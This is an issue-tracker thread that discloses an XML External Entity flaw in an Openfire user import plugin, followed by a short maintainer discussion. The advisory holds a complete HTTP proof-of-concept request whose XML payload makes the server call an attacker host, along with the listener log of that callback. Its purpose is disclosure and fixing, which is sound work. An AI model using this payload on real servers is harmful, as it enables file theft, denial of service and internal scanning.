XML External Entity injection vulnerability with User Import Export Plugin

[akrherz]

...Migrated from Ignite Jira OF-1302...

Credit for Discovery
Jerzy Kramarz, Michail Sarantidis, Rafael Gil Larios, Giovani Cattani, Anton Garcia [portcullis-security]

Description
User Import Export Plugin version 2.6.0 (available from Plugin Admin) for Openfire 4.1.2-1 is
vulnerable to an XML External Entity injection attack. The following xml payload was used to trigger
the XXE:

POST /plugins/userimportexport/import-user-data.jsp?importUsers HTTP/1.1
Host: X.X.X.X
Content-Length: 1099
Cache-Control: max-age=0
Origin: http://X.X.X.X
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX9mrcUIz112RSAao
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
DNT: 1
Referer: http://X.X.X.X/plugins/userimportexport/import-user-data.jsp
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=hlivs8z10wt119qjaplsisxua; _bitnami_closed_banner_03153=1;
csrf=h42FIlrzUNS2Oql
Connection: close
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="thefile"; filename="/tmp/lololo.xml"
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % remote SYSTEM
"http://x.x.x.x/xxe"> ]>
<server-data xmlns="urn:xmpp:pie:0">
<host jid="X.X.X.X">
<user name="admin" password="bitnami">
<query xmlns="jabber:iq:roster"/>&xxeq3nbu;</user>
<user name="test" password="test">
<query xmlns="jabber:iq:roster">
<item jid="12" subscription="none">
<group/>
</item>
</query>
</user>
</host>
</server-data>
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="previousDomain"
------WebKitFormBoundaryX9mrcUIz112RSAao
Content-Disposition: form-data; name="xep227support"
true
------WebKitFormBoundaryX9mrcUIz112RSAao--
On the attacking Server, the following request can be observed:

Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.1
User-Agent: Java/1.8.0_121
Host: x.x.x.x
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

The application can be exploited via either Cross Site Request Forgery or if account with given
credentials is compromised.

Impact
This vulnerability may allow the retrieval of arbitrary files or the causing of a Denial of Service
condition (by making the server read from a file such as `/dev/random’). External entities can also
reference URLs, potentially allowing port scanning from the XML parser’s host, or the retrieval of
sensitive web content that would otherwise be inaccessible due to network topology and defences.

[guusdk]

@annovanvliet Am I right that you added this as a feature, rather than a bug? There seems to be explicit code in this plugin that resolves remote entities.

I'm not sure if this is at all used, but I can see (some) value in it. Should we leave this as-is, add it behind some kind of configuration option, or remove it completely?

[annovanvliet]

I am looking at the code, but it does not make sense to me leave it in if it creates vulnerabilities. Using external xml entities in a user import file has for me no added value. I see an entity resolver which just resolves each entity to nothing. This is useful in our usecase. But maybe I misunderstood the issue.

[guusdk]

This is useful in our usecase.

How is this useful to you?